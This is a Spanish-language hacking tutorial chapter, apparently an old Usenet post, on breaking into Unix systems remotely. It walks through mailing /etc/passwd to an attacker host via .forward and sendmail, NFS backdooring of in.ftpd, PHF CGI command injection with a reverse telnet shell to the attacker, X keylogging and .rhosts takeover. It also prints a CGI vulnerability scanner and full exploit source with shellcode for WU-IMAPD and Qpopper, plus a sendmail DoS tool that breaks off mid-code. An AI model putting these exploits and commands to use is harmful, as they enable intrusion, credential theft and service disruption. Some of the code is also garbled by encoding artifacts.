eso es lo que diferencia a un lamer de unhacker: el lamer desbarata
sistemas con las herramientas que el hacker inventa. Alguna vez,
podreis penetrar un sistema utilizando un exploit, por ejemplo, y
conseguir una shell de root…y quizas os sentireis contentos de haber
alcanzado tal privilegio,… pero =BFHabeis escrito vosotros el
exploit?…Luego quizas instalareis un sniffer y una puerta
trasera…=BFpero habeis hecho vosotros esas herramientas? Lo ideal
seria que programarais algunas de las herramientas que utilizarais
luego en vuestras incursiones, y si no es asi, leed e intentad
comprender el codigo que utilizais.

Pero bueno, vamos al grano.

Un saludo para los que estan siguiendo el CPH aunque en pleno
verano. Saludos a los que vuelven, como mi amigo NBK que ya lo he
visto por las news, y a tantos otros. Para los que se han marchado
como Crino, Avalanche, etc…si no encuentran algun capitulo porque
haya expirado, etc, al final voy a intentar ensamblar todos los
capitulos en un solo documento comprimido y lo dejare en
es.binarios.misc, para no consumir ancho de banda.

Saludos,

LECTER

CPH. CAPITULO 3.INTRODUCCION EN EL SISTEMA

En este capitulo consideraremos tecnicas de acceso remoto (a traves de
la red) y en el siguiente estudiaremos el acceso local, que tambien
recibe el nombre de “ataque con escalada de privilegios”. Existe una
progresion cuando el atacante se introduce de manera remota y luego
consigue el acceso a la shell local. Habra que alcanzar privilegios de
root y mantenerlos, asi como actuar sobre el sistema para adecuarlo a
futuras visitas o a otros propositos.

Existen varios metodos fundamentales para introducirnos remotamente en
un sistema unix:

(1) Fallos de seguridad de aplicaciones basadas en el protocolo
TCP/IP.

(2) Defectos de configuracion en los servicios de red NFS, NIS y en
formularios web.

(3) Mala configuracion en los archivos hosts.equiv y .rhosts y empleo
de los llamados “comandos *r de unix”.

(4) Exploits para ciertos procesos que se basan en bugs de los mismos
o en ataques para desbordar la pila del proceso y ejecutar codigo
arbitrario que permiten conseguir una shell, una rootshell si el
proceso corresponde a un programa que tiene el bit setuid activado.

(5) Tecnicas oscuras: Ataques DoS, IP Spoofing, hijacking, ingenieria
social, web hostiles…Estas tecnicas no deberian usarse mas que en
situaciones muy criticas. He pensado dedicar un capitulo final,
despues del de borrar las huellas para incluir estos procedimientos,
quiza con el titulo de “la mitad oscura”.

Podemos emplearlas de dos modos diferentes para introducirnos en el
sistema: hacerlo directamente consiguiendo una cuenta en el objetivo o
indirectamente haciendonos con el fichero /etc/passwd para crackearlo.

3.1. Fallos de seguridad en aplicaciones TCP/IP

3.1.1 TFTP (Trivial File Transfer Protocol)

Se trata de una transferencia de archivos por udp. Se utiliza para
arrancar estaciones de trabajo o routers y esta basado como ya dije en
udp escuchando por el puerto 69 ;-P. Si el servidor TFTP esta mal
configurado, podemos conseguir el fichero /etc/passwd. En las ultimas
versiones quedan configurados de manera predeterminada para prohibir
el acceso a cualquier directorio excepto /tftpboot. Pero en este
directorio existe informacion comprometedora sobre los archivos de
configuracion de los routers (generalmente como
.cfg) y los intrusos pueden acceder a las
contrase=F1as de los routers y a las cadenas SNMP (Simple Network
Management Protocol), con lo cual comprometeremos redes completas.

3.1.2 FTP

Muchos servidores mal configurados permiten tener acceso anonimo,
permitiendo iniciar una sesion sin necesidad de autenticacion y
pudiendo acceder a toda la estructura de directorios del
sistema…Pero esto son habas contadas y muy peregrino debe ser el
root para meter la pata de ese modo. Algunas veces me han hablado de
servidores FTP que disponian de directorios donde podia escribir
cualquiera, con lo cual los atacantes podrian colocar un fichero
.rhosts (como ya veremos) en el directorio /home de algun usuario y
luego hacer un rlogin sin autenticacion. Habia una estratagema basada
en esto que permitia conseguir el fichero /etc/passwd de modo curioso
y sin magno artificio: Un archivo .forward en el directorio /home/ de
un usuario dirige el correo a una cuenta diferente o ejecuta alguna
instruccion cuando llega correo. De este modo, si escribimos un
fichero (en nuestra maquina atacante darkstar.us.es) lecter_forward de
este modo:

$>echo “/bin/mail lecter@darkstar.us.es < /etc/passwd” > lecter_forward

Luego nos conectamos por ftp al objetivo

$>ftp objetivo.net

Si fuera posible escribir en /home/ftp/ podriamos hacer

ftp>put lecter_forward .forward
ftp>quit

y luego mandamos un correo al “usuario ftp”

$>echo hello chump | mail ftp@objetivo.net

Cuando llegue el correo se ejecutara la instruccion contenida en el
fichero .forward y recibiremos por correo el fichero /etc/passwd
)…Pero a mi nunca me ha funcionado. Aparte de estas
vulnerabilidades existen otras debidas a condiciones de desbordamiento
del buffer en versiones anteriores de wu-ftp 2.4.2, pero esto ya lo
veremos en el epigrafe de los exploits.

3.1.3 SMTP

Aunque hay otros mas seguros como smail y qmail, sendmail es el MTA
(Mail Transfer Agent) mas usado en el mundo unix. Si sendmail no se
configura adecuadamente, puede presentar problemas de seguridad,
ademas de los inherentes a fallos y vulnerabilidades del propio
programa. Una frase corriente hasta hace poco tiempo (la seguridad de
sendmail ha mejorado bastante en los ultimos anyos) era “Wellcome to
the sendmail bug of the week!”.

Un ataque con solera (para la version sendmail 4.1) se baso en la
vulnerabilidad de la “sendmail pipe”, que permitia al intrusoejecutar
instrucciones mediante sendmail con privilegios de bin. En versiones
anteriores a sendmail 5.57 podiamos enviarnos el fichero /etc/passwd
simplemente haciendo:

$>telnet objetivo.net 25
=2E..
helo
=2E..
mail from: “|/bin/mail lecter@darkstar.us.es < /etc/passwd”
rcpt to: johnsilver
data
=2E
quit

Pero para aprovechar los fallos de sendmail es mejor recurrir a los
exploits como se vera en el correspondiente epigrafe.

3.2 Defectos de configuracion de servicios de red

3.2.1 NFS

Ya sabemos que si el servicio nfs esta mal configurado podemos hacer
algunas cosillas ). Si hacemos un rpcinfo -p objetivo.net y nos
encontramos con algunas lineas en cuyos puertos escuchan los
servidores mountd y nfs, podemos mediante un showmount -e objetivo.net
los directorios exportados.

En caso de que no tuvieramos un objetivo concreto podemos buscar
maquinas con ficheros exportables mediante el script perl getdomain.pl
de Invisible Evil, que muestro a continuacion:

—————/begin getdomain.pl———————————
#!/usr/bin/perl

# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) =3D @ARGV;
usage() if (!defined($inputfile) || !defined($domain));

# Open and preprocess the input file.
open(INFILE, “<$inputfile”) or die(“Cannot open file $inputfile for reading!\n”);
my(@lines) =3D ;

# Initialize main data structure.
my(%hash) =3D {};
my($key) =3D “”;

foreach (@lines) {
$key =3D (split(/\ /))[0];
chop($key);
next if ((($key =3D~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =3D~ m/root-server/i));
$hash{$key}++;
}

# Close input file and output data structure to STDOUT.
close(INFILE);

foreach (sort(keys(%hash))) {
print “$_\n”;
}

sub usage {
print(“\n\ngetdomain:\n”);
print(“Usage: getdomain [inputfile] [search]\n\n”);
print(“Where [search] is one of \’com\’, \’edu\’, \’gov\’, \’mil\’ or \’net\’.\n\n”);
exit(0);
}
�
0;
�
———-/end of getdomain.pl——————————————–

Para utilizarlo habeis de disponer de listas de maquinas que se pueden
obtener facilmente por ftp de rs.internic.net con las extensiones:

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

Despues de descomprimirlas con gunzip ejecutamos el script asi:

$>perl getdomain.pl com.zone com > com.all

y lo mismo con las otras zonas…

Luego hay que usar otro script llamado cmount.pl para ver los
directorios exportados. Aqui lo teneis

—————-/begin cmount.pl———————————–
#/usr/bin/perl -w
#
# Check NFS exports of hosts listed in file.
# (Hosts are listed, once per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net – 2/27/97.

# Assign null list to @URLs which will be added to later.
my(@result) =3D ();
my(@domains) =3D ();
my($program) =3D “showmount -e “;

# Pull off filename from commandline. If it isn’t defined, then assign default.
my($DomainFilename) =3D shift;
$DomainFilename =3D “domains” if !defined($DomainFilename);

# Do checking on input.
die(“mountDomains: $DomainFilename is a directory.\n”) if (-d
$DomainFilename);
�
# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename) or
die(“mountDomains: Cannot open $DomainFilename for input.\n”);
�
while () {
chomp($_);
print “Now checking: $_”;

# Note difference in program output capture from “geturl.pl”.�
open (EXECFILE, “$program $_ |”);
@execResult =3D ;
next if (!defined($execResult[0]));
if ($execResult[0] =3D~ /^Export/) {
print ” – Export list saved.”;
open (OUTFILE, “>$_.export”);
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print “\n”;
}
�
# We are done. Close all files and end the program.
close (DOMAINFILE);

0;
—————– end of cmount.pl
Bueno, imaginemos que en el caso de nuestro objetivo, nos sale.

#>showmount -e objetivo.net
/ (everyone)
/usr (everyone)

=A1Magn=EDfico! (Pero no caera esa breva) porque podriamos comenzar
mountando

#>mount -nt nfs objetivo.net:/ /mnt

Pero existe una excelente herramienta llamada nfsshell escrita por
Leendert van Door que podreis encontrar en

ftp://ftp.cs.vu.nl/pub/leendert/nfsshell.tar.gz

que nos proporciona un cliente robusto llamado nfs que funciona como
cliente ftp y permite manipular facilmente cuakquier sistema de
archivos remotos. Una vez instalado, haced en un xterm

#>nfs

y aparecera el prompt nfs>. Si haceis help vereis todas las
posibilidades=2E Bueno, al grano:

nfs>host objetivo.net (indica el host que queremos montar)

Luego miramos los archivos exportados

nfs>export
/ everyone
/usr everyone

Ahora tenemos que montar / para acceder al sistema de archivos con

nfs> mount /

Podemos ver el status de la conexion y el UID usado cuando se monto el
archivo con

nfs>status
=2E..

Como ya tenemos el sistema de archivos montado posemos mirar el
contenido de /etc/passwd:

nfs>cd /etc

nfs> cat passwd
=2E..

El listado de /etc/passwd nos da los nombres de los usuarios y sus ID,
pero generalmente estaran “sombreados” (shadowed passwords) con una
“x” (generalmente) en el segundo campo de cada registro. No
importa. Busquemos un usuario daemon o bin. Si podemos acceder a los
binarios, =A1asunto zanjado! Suponfamos que existe el registro:

bin:x:2:2::/usr/bin

Vamos a montar /usr y cambiar nuestro UID y GID al de bin:

nfs>mount /usr

nfs>uid 2

nfs>gid 2

(y lo comprobamos con nfs>status)

A partir de ahora, tenemos los privilegios de bin en el sistema
remoto. Ahora podemos crear un canal trasero con el siguiente script
en nuestro sistema (darkstar.us.es) y llamarlo in.ftpd en el mismo
lugar donde activamos el cliente nfs (abrimos un xterm y hacemos vi
in.ftpd en el mismo directorio donde lanzamos el cliente nfs. El
contenido del script sera:

#!/bin/sh
/usr/—ruta hasta–/bin/xterm -display darkstar.us.es:0.0 &

luego lo salvamos y le damos permisos de ejecucion.

Despues volvemos al otro xterm y hacemos

nfs>cd /sbin

nfs>put in.ftp

De esta manera copiamos in.ftpd a /sbin, reescribiendo el
original. Entonces desde la otra xterm permitimos a objetivo.net
conectarse a nuestro servidor X:

#>xhost +objetivo.net
=2E..

#>ftp objetivo.net

Lo que sucedera es que aparecera en nuestro sistema un xterm
perteneciente al administrador de objetivo.net, pues al llamar a
in.ftpd desde inetd, este ejecutara nuestro script con privilegios de
root.
3.2.2 NIS

Ya hemos hablado del NIS, anta=F1o conocido como Yellow Pages (de ahi
el yp…). Cuando hacemos rpcinfo -p objetivo.net y aparece un
servidor ypserv ya estamos seguros de que el NIS esta funcionando. Si
mediante algun artificio tuvieramos una cuenta en una maquina con NIS
tendriamos la posibilidad de acceder al archivo /etc/passwd. Para
saber si en una maquina donde tenemos cuenta funciona NIS, hacemos ps
ax y si aparece el conocido ypserv =A1ya esta! En tal caso podriamos
usar el comando ypcat:

$>ypcat /etc/passwd> ~/passwd

para copiarnos el /etc/passwd en nuestro home. En caso de no tener
privilegios para ejecutar ypcat o si no esta, se puede usar el
programa pwget (este lo veremos en el capitulo 4 destinado al acceso
local). Ademas existe un programa llamado ypx para extraer los mapas
de un servidor NIS y lo podeis encontrar en:

http://morehouse.org/hin/root/ypx.tgz

Su uso es muy sencillo:

ypx -m passwd nombre_dominio_NIS
3.2.3 Inseguridades en scripts CGI

La interfaz CGI (Common Gateway Interface) permite la comunicacion
entre programas cliente y un servidor que emplea el protocolo http. El
protocolo de comunicaciones usado por el script CGI y el servidor es
el TCP/IP usando por defecto el puerto 80. Las vulnerabilidades no se
deben a fallos de CGI, sino a errores en las especificaciones HTTP y
programas del sistema. La parte fundamental de un script CGI es un
documento HTML llamado FORM (Formulario). Los scripts CGI deberian
realizar el filtrado de los contenidos del campo del
formulario (entradas de usuarios), pero en muchos casos, no lo
hacen…con lo cual es posible ganar un acceso ;-D. PHF es un script
CGI estandar en las primeras versiones del servidor Apache y NCSA
HTTPD. Aunque parezca raro, todavia hay sistemas que presentan esta
vulnerabilidad, por eso la cuento. El programa de marras no procesaba
ni validaba adecuadamente la entrada. PHF aceptaba el caracter de
newline (%0a) y ejecutaba cualquier mandato posterior con la UID del
usuario que estuviera ejecutando el servidor (generalmente nobody). El
codigo utilizado era el siguiente, que puede lanzarse desde nuestro
navegador (lynx para los castizos; Netscape para los modelnos):

http://www.objetivo.com/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd

De este modo (%20) es un espacio) podria tenerse acceso a /etc/passwd;
pero si estan sombreados habra que pensar en otra cosita:

http://www.objetivo.com/cgi-bin/phf?Qalias=3Dx%0a/usr/X11R6/bin/xterm%20-ut%20-display%20darkstar_IP:0.0

El servidoe web remoto ejecutara un xterm y lo montara en nuestro
servidor X (darkstar.us.es) con un ID de ventana 0 y un ID de pantalla
0. Como esta activada la opcion -ut, el sistema no registrara esta
actividad. Hay numerosos scripts para buscar sistema con scripts CGI
y PHF como vereis a continuacion:

——————-/begin cgi scanner———————————-

/* This source is absolutely free to use and modify at you own risk, please
do not change some chars and say that this program is yours or i’ll die the
next day… . Pay attention, this file is for research purpose only, do not
use it into any hacking way. Is possible to be logged while running the
program, so PAY ATTENTION!.
Tested on Linux RedHat 5.0 and Win95 compiled with Cygnus Gnu win32.

Many Thanks goes to s0ftpr0ject and Orda of the Badlands groups!
I want also give a big thanks to:

Goku: my linux guru
SMaster: my prezident
MaNdraKe: and his future girlfriends
Pr3dator: for his help on linux (go slower on cars!:pPp)
PhoenYx: the best italian hacker
Berk: a cool friend and a wannabe hacker
xOANON: the best cracker all around
Golem: for his bot, what about setting it on #softpj?
Spaceone: a good friend
TanK_GirL: a future hacker! (i hope)
RootShell: for many source and ideas

I want also give a big fuck to:

Telecom Italia: u must die!
WarLords: Good ircwarriors but stupid people
Alexb: pay attention at your fuckin’ shells
Lamers: try to be more newbies!

by |scacco|

Add-on By Dark Schneider

#include
#include
#include �
#include
#include
#include
#include
#include
#include �
#include �
#include
#include
#include
#include
#include
#define MAXSTR 12

main (int argc, char *argv[])
{
struct sockaddr_in sin;
/* int outsocket, serv_len, len,c,outfd; */
/* struct hostent *nametocheck; */
/* struct in_addr outgoing; */
struct hostent *hp;
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int sock, i=3D0, X;
char *stringhe[MAXSTR];
for(i=3D0;i stringhe[i]=3D(char *) malloc(sizeof(char)*100);
}
�
/* Classic PHF bug… It still Works! */
�
stringhe[0]=3D”GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd\n”;
�
/* test-cgi bug, possible to view documents location */
�
stringhe[1]=3D”GET /cgi-bin/test-cgi?*\n”;
�
/* htmlscript bug, a good language that can us have passwd */
�
stringhe[2]=3D”GET /cgi-bin/htmlscript?../../../../etc/passwd\n”;
�
/* view-source bug, some httd use this… */
�
stringhe[3]=3D”GET /cgi-bin/view-source?../../../../etc/passwd\n”;
�
/* Wrap allow you to have a directory listing on IRIX 6.2 systems */
�
stringhe[4]=3D”GET /cgi-bin/wrap?/../../../../../etc\n”;
�
/* Campas allow you to get the passwd on NCSA server 1.2 */
�
stringhe[5]=3D”GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a\n”;
�
/* With pfdisplay & webdist is possible to get the passwd on IRIX 6.2 systems */
�
stringhe[6]=3D”GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n”;
�
stringhe[7]=3D”GET /cgi-bin/webdist.cgi?distloc=3D;cat%20/etc/passwd\n”;

/* With aglimpse is possible to mail the password file anywhere */
�
stringhe[8]=3D”GET /cgi-bin/aglimpse/80|IFS=3D5;CMD=3D5mail5dashie\@cyberdude.com\ �
/* An interesting variant for phf*/

stringhe[9]=3D”GET /cgi-bin/phf?Qalias=3Dx%0a/usr/bin/ypcat%20passwd\n”;

stringhe[10]=3D”GET /cgi-bin/php.cgi?/etc/passwd\n”;

/* a new test-cgi but the bug is the same */

stringhe[11]=3D”GET /cgi-bin/nph-test-cgi?*\n”;
�
while(fgets(hosta,100,stdin))
{
if(hosta[0] =3D=3D ‘\0′)
break;
hosta[strlen(hosta) -1] =3D ‘\0′;
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,”\n”,sizeof(char));
�
hp =3D gethostbyname (hosta);
for(i=3D0;i bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family =3D hp->h_addrtype;
sin.sin_port =3D htons(80);
sock =3D socket(AF_INET, SOCK_STREAM, 0);
X=3Dconnect(sock,(struct sockaddr *) &sin, sizeof(sin));
write(sock,stringhe[i],strlen(stringhe[i])*sizeof(char));�
while((X=3Dread(sock,FileBuf,8096))!=3D0)
write(1,FileBuf,X);
�
}

}
printf(“\nScacco&Dark Schneider – S0ft Pr0ject 98″);
}

—————/end CGI scanner———————————-

Hay otros pero este ya vale.

Bueno…y si el administrador ha eliminado las X? Entonces habra que
recurrir a un canal trasero. En la mayor parte de los servidores unix
hay instalado un cliente telnet sin restricciones de empleo. Para
conseguir nuestro canal trasero realizaremos un “telnet inverso”
utilizando la herramienta netcat para activar escuchas en nuestro
propio sistema. Debemos ejecutar los siguientes comandos en sendos
xterms de nuestra maquina:

(xterm1)#>nc -l -n -v -p 80

(xterm2)#>nc -l -n -v -p 25

Hemos de asegurarnos de que no hay demonio alguno escuchando por tales
puertos en nuestro sistema y si los hay haced un ps ax y luego
matadlos con kill -9 . Los dos mandatos nc escuchan en los
puertos 80 y 25 de nuestra maquina. Para iniciar el telnet inverso,
ejecutamos en el servidor objetivo desde nuestro navegador:

http://www.objetivo.com/cgi-bin/phf?Qalias=3Dx%0a/bin/telnet%20darkstar_IP%2080%20|%20/bin/sh%20|%20/bin/telnet%20darkstar_IP%2025

que equivaldria a hacer en la maquina remota:

/bin/telnet darkstar_IP 80|/bin/sh/|/bin/telnet darkstar_IP 25

El mandato /bin/telnet darkstar_IP 80 se conecta a nuestra escucha
netcat en el puerto 80. Aqui es donde escribiremos nuestras
ordenes. La salida estandar o las pulsaciones de teclas que hagamos se
introduciran en /bin/sh. Posteriormente, el resultadode nuestros
mandatos se dirigira a /bin/telnet darkstar_IP 25. Al final tenemos un
telnet inverso que se ejecuta en dos ventanas separadas. Se escogen
los puertos 80 y 25 porque son servicios comunes que generalmente
permiten los cortafuegos. Existen otros modos de explotar las
vulnerabilidades CGI, pero se llevan a cabo desde acceso local.

3.2.4 Vulnerabilidades de servidores X

Muchos servidores X ejecutan de forma predeterminada xhost+
permitiendo que cualquier usuario local o remoto acceda al servidor X
sin autenticarse y muchos administradores ni se percatan. Existe una
utilidad llamada xscan que podeis encontrar en

http://morehouse.org/hin/root/xscan.tar.gz

que permite identificar los servidores X que tienen activado
xhost+. Una vez instalada hacemos

$>xscan objetivo.net
=2E..
Connecting to objetivo.net…on port 6000
connected
Host objetivo.net is running X
Starting keyboard logging of host objetivo.net
:0.0 to file KEYLOGobjetivo.net:0.0.

A partir de ahora, cualquier pulsacion de teclas realizada en la
consola de la maquina remota quedara registrada en el archivo
KEYLOGobjetivo.net. Si ejecutamos un tail sobre el archivo de registro
podemos ver lo que el usuario esta escribiendo en el teclado:

$>tail -f KEYLOGobjetivo.net:0.0
su -
[shift_L * Iamowned (Shift_R)]

Asi vemos que el usuario ha ejecutado el comando su con el password de
root “Iamowned” )).
3.3 Mala configuracion de hosts.equiv y .rhosts

En una red basada en TCP/IP el fichero /etc/hosts.equiv es una base de
datos general que controla el acceso a nivel de hosts, y el fichero
/home/usuario/.rhosts controla el acceso a la maquina a nivel de
usuario. Las maquinas cuyos nombres encontremos en /etc/hosts.equiv o
en ~/.rhosts se llaman “trusted hosts” o maquinas de confianza por
parte del objetivo. Cuando intentamos conectarnos a la maquina remota
mediante rlogin (la maquina remota ha de tener el puerto 513 tcp
rlogin activo)

$>rlogin -l objetivo.net

el demonio rlogin busca en /etc/hosts.equiv por el nombre de nuestra
maquina y si lo encuentra, hemos conseguido el acceso. Tambien podemos
intentarlo haciendo

~>rlogin -l usuario objetivo.net

entonces rlogin busca el nombre de nuestra maquina en el fichero
/home/usuario/.rhost y si la encuentra, tambien hemos conseguido el
acceso. Un antiguo “bug” de rlogin permitia conseguir una rootshell
haciendo

$>rlogin objetivo.net -l -froot.

Si una maquina tiene el rlogin activado (y no tiene filtros tcp
warppers) debemos intentar escribir una “+” en ~/.rhosts o
/etc/hosts.equiv. Muchos ya vienen con la entrada “+” en dichos
archivos por defecto y eso significa que cualquier otra maquina sera
un “trusted hosts”. Voy a ilustrar esto con un ejemplito de lo mas
interesante. Supongamos que sabemos que en nuestro sistema objetivo
estan activos los servicios rlogin, mountd y nfs. Si hacemos

#>showmount -e objetivo.net
y nos sale

/home

Lo primero que haremos sera crear un directorio para montar /home

#>mkdir patapalo

#>mount -nt nfs objetivo.net:/home /patapalo

#>ls -la /patapalo
Imaginemos que encontramos la siguiente entrada con UID=3D102:

1 drwx—— 15 102 100 1024 Jul 8 18:57 skywalker/

Hacemos una entrada nueva en nuestro fichero de passwd para skywalker pero sin contrase=F1a:

#>echo “skywalker::102:2::/patapalo: /bin/shi” >> /etc/passwd

#>su – skywalker
(sin contrasenya)

Una vez como skywalker, podemos hacer:

#>echo “+ +” > skywalker/.rhosts (hacemos que la maquina remota considere a cualquiera, nosotros por ejemplo, como de confianza)

#>cd /

#>rlogin -l skywalker objetivo.net
Wellcome to objetivo.net
=2E..

objetivo.net:~$>

=A1Ya tenemos cuenta en el sistema!

Para desmontar el archivo, salimos del directorio y hacemos

#>umount /patapalo

De todos modos es muy raro que pasen estas cosas…los tcp warppers
deberian tener bien configurados sus ficheros de hosts.allow y
hosts.deny…pero por defecto, al instalarse automaticamente los tcp
warppers en el sistema (linux p.ej.) los ficheros de configuracion
mencionados estan vacios de reglas de acceso.
3.4 Exploits

Los exploits son procedimientos que nos permiten aprovechar (explotar)
un fallo o vulnerabilidad en ciertos programas que se ejecutan con el
bit setuid activado y que nos permiten acceder al sistema generalmente
con una rootshell. Si bien la mayor parte de las veces se utilizan en
acceso local como procedimiento para acceder a los privilegios de
root, tambien se usan para el acceso remoto utilizando alguna utilidad
de red como telnet o netcat.

La mayor parte de los exploits se basan en desbordamientos del buffer
de la pila(stack buffer overflow). En el excelente articulo de
AlephOne aparecido en noviembre de 1996 en el Phrack (49, file 14) y
titulado “Smashing the Stack for Fun and Profit” se describe
minuciosamente como es posible desbordar el buffer de la pila del
proceso y establecer la direccion de retorno para que se ejecute
codigo arbitrario, generalmente una rutina en ensamblador (a veces
llamada “egg”) que ejecuta /bin/sh con privilegio de root (si el
programa tenia el bit setuid activado). Esta vulnerabilidad la
presentan en principio los programas que llaman a determinadas
funciones C tales como strcpy(), strcat() y sprintf() que no verifican
el tama=F1o de los arrays. Hay un articulo muy sencillo de leer (o lo
habia) en http://hello.to/hacker_novatos escrito por RaiSe para los
neofitos, pero debeis de tener al menos unas nociones de programacion
C, la distribucion en la memoria de un proceso unix y algo de
ensamblador (CPU Intel y linux como so). Yo por mi me enrrollaria un
poco con el tema porque es apasionante y es relativamente sencillo
escribir nuestros propios exploits…pero eso sera otra historia si
Dios quiere que disponga de tiempo para hacer una introduccion a la
realizacion de exploits. Basta decir que si visitamos la pagina

http://www.rootshell.com

y buscamos en “exploits” encontraremos de todo. En cada uno de ellos
se explica el modus operandi para aplicarlos. Yo he recogido algunos
recientitos para Linuxy los pego a continuacion:

**Uno para imap, del 98

——————-/begin imap exploit———————-

THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF THE ADM CREW
�
Linux WU-IMAPD 4.1 remote root exploit (4/98)
by ndubee||plaguez
dube0866@eurobretagne.fr

Usage: ./imapx
�
where offset =3D -500..500 (brute force if 0 doesnt work)

Credits:
- Cheez Whiz (original x86 BSD exploit)
- #!w00w00 and #!ADM

Note:
if you plan to port this to other OS., make sure the
shellcode doesn’t contain lower case chars since imapd
will toupper() the shellcode, thus fucking it up.

#include
#include
#include
#include
#define BUFLEN 2048
#define NOP 0×90

char shell[] =3D
/*
jmp 56
popl %esi
movl %esi,%ebx
movl %ebx,%eax
�
addb $0×20,0×1(%esi)
addb $0×20,0×2(%esi)
addb $0×20,0×3(%esi)
addb $0×20,0×5(%esi)
addb $0×20,0×6(%esi)
�
movl %esi,%edi
addl $0×7,%edi
xorl %eax,%eax
stosb %al,%es:(%edi)
movl %edi,%ecx
movl %esi,%eax
stosl %eax,%es:(%edi)
movl %edi,%edx
xorl %eax,%eax
stosl %eax,%es:(%edi)
movb $0×8,%al
addb $0×3,%al
int $0×80
xorl %ebx,%ebx
movl %ebx,%eax
incl %eax
int $0×80
call -61
.string \”/BIN/SH\”
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff ;markup

“\xeb\x38\x5e\x89\xf3\x89\xd8\x80″
“\x46\x01\x20\x80\x46\x02\x20\x80″
“\x46\x03\x20\x80\x46\x05\x20\x80″
“\x46\x06\x20\x89\xf7\x83\xc7\x07″
“\x31\xc0\xaa\x89\xf9\x89\xf0\xab”
“\x89\xfa\x31\xc0\xab\xb0\x08\x04″
“\x03\xcd\x80\x31\xdb\x89\xd8\x40″
“\xcd\x80\xe8\xc3\xff\xff\xff\x2f”
“\x42\x49\x4e\x2f\x53\x48\x00″;

void
main (int argc, char *argv[])
{
char buf[BUFLEN];
int offset=3D0,nop,i;
unsigned long esp;

fprintf(stderr,”usage: %s \n”, argv[0]);
�
nop =3D 403;
esp =3D 0xbffff520;
if(argc>1)
offset =3D atoi(argv[1]);

memset(buf, NOP, BUFLEN);
memcpy(buf+(long)nop, shell, strlen(shell));
�
for (i =3D 512; i < BUFLEN – 4; i +=3D 4)
*((int *) &buf[i]) =3D esp + (long) offset;

printf(“* AUTHENTICATE {%d}\r\n”, BUFLEN);
for (i =3D 0; i < BUFLEN; i++)
putchar(buf[i]);
�
printf(“\r\n”);

return;
}
————–/end imap exploit———————————–
**Otro para qpop3

—————–/begin qpop3 exploit—————————–
/*
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* By Zhodiac <zhodiac@softhome.net>
*
* Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
* Overflow at pop_list()->pop_msg()
*
* Tested: 3.0beta28 offset=3D0
* 3.0beta26 offset=3D0
* 3.0beta25 offset=3D0
*
* #include
*
* This code is dedicated to my love [CrAsH]] and to all the people who
* were raided in Spain in the last few days.
*
* Madrid 10/1/2000
*
*/

#include

#define BUFFERSIZE 1004
#define NOP 0×90
#define OFFSET 0xbfffd9c4

char shellcode[]=3D
“\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89″
“\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89″
“\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh”;
void usage(char *progname) {
fprintf(stderr,”Usage: (%s []; cat) | nc 110″,progname);
exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=3DOFFSET;
int aux;

fprintf(stderr,”\n!Hispahack Research Team (http://hispahack.ccc.de)\n“);
fprintf(stderr,”Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n“);

if (argc<3) usage(argv[0]);

if (argc=3D=3D4) offset+=3Datol(argv[3]);

ptr=3Dbuffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
ptr+=3Dsizeof(buffer)-strlen(shellcode)-16;
memcpy(ptr,shellcode,strlen(shellcode));
ptr+=3Dstrlen(shellcode);
long_ptr=3D(unsigned long*)ptr;
for(aux=3D0;aux<4;aux++) *(long_ptr++)=3Doffset;
ptr=3D(char *)long_ptr;
*ptr=3D’\0′;

fprintf(stderr,”Buffer size: %d\n”,strlen(buffer));
fprintf(stderr,”Offset: 0x%lx\n\n”,offset);

printf(“USER %s\n”,argv[1]);
sleep(1);
printf(“PASS %s\n”,argv[2]);
sleep(1);
printf(“LIST 1 %s\n”,buffer);
sleep(1);
printf(“uname -a; id\n”);

return(0);
}

————————/end qpop exploit—————————–
**Otro para sendmail

——————–/begin sendmail exploit—————————
/*
against.c – Another Sendmail (and pine DoS (up to 8.9.2)
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define MAXCONN 5
#define LINES 150000

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {
�
printf(“against.c – another Sendmail DoS (up to 8.9.2)\n”);

if (argc-3) {
printf(“Usage: %s victim_user victim_host\n”,argv[0]);
exit(0);
}
�
hp=3Dgethostbyname(argv[2]);
�
if (!hp) {
perror(“gethostbyname”);
exit(1);
}

fprintf(stderr,”Doing mess: “);

for (;loop FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=3Dhp->h_addrtype;
s.sin_port=3Dhtons(25);
if ((suck=3Dsocket(AF_INET,SOCK_STREAM,0))<0) perror(“socket”);
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror(“connect”);
if (!(d=3Dfdopen(suck,”w”))) { perror(“fdopen”); exit(0); }

usleep(100000);

